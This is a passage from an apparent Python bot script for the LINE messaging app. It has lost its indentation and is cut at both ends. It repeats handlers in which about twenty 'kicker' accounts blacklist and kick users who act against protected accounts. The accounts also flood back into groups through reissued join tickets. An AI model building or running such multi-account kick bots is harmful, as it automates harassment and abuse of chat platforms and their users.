G = kicker18.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker18.updateGroup(G)
Ticket = kicker18.reissueGroupTicket(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
pass
return
if ga5 in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
G = kicker19.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.updateGroup(G)
Ticket = kicker19.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker19.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker19.updateGroup(G)
Ticket = kicker19.reissueGroupTicket(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
pass
return
if ga6 in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
G = kicker20.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.updateGroup(G)
Ticket = kicker20.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker20.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker20.updateGroup(G)
Ticket = kicker20.reissueGroupTicket(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
pass
return
if ga7 in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
G = kicker.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.updateGroup(G)
Ticket = kicker.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker.updateGroup(G)
Ticket = kicker.reissueGroupTicket(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
pass
return
if ga8 in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
G = kicker2.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.updateGroup(G)
Ticket = kicker.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker2.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker2.updateGroup(G)
Ticket = kicker2.reissueGroupTicket(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
pass
return
if ga9 in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
G = kicker3.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.updateGroup(G)
Ticket = kicker.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker3.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker3.updateGroup(G)
Ticket = kicker3.reissueGroupTicket(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
pass
return
if ga10 in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
G = kicker4.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.updateGroup(G)
Ticket = kicker.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker4.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker4.updateGroup(G)
Ticket = kicker4.reissueGroupTicket(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
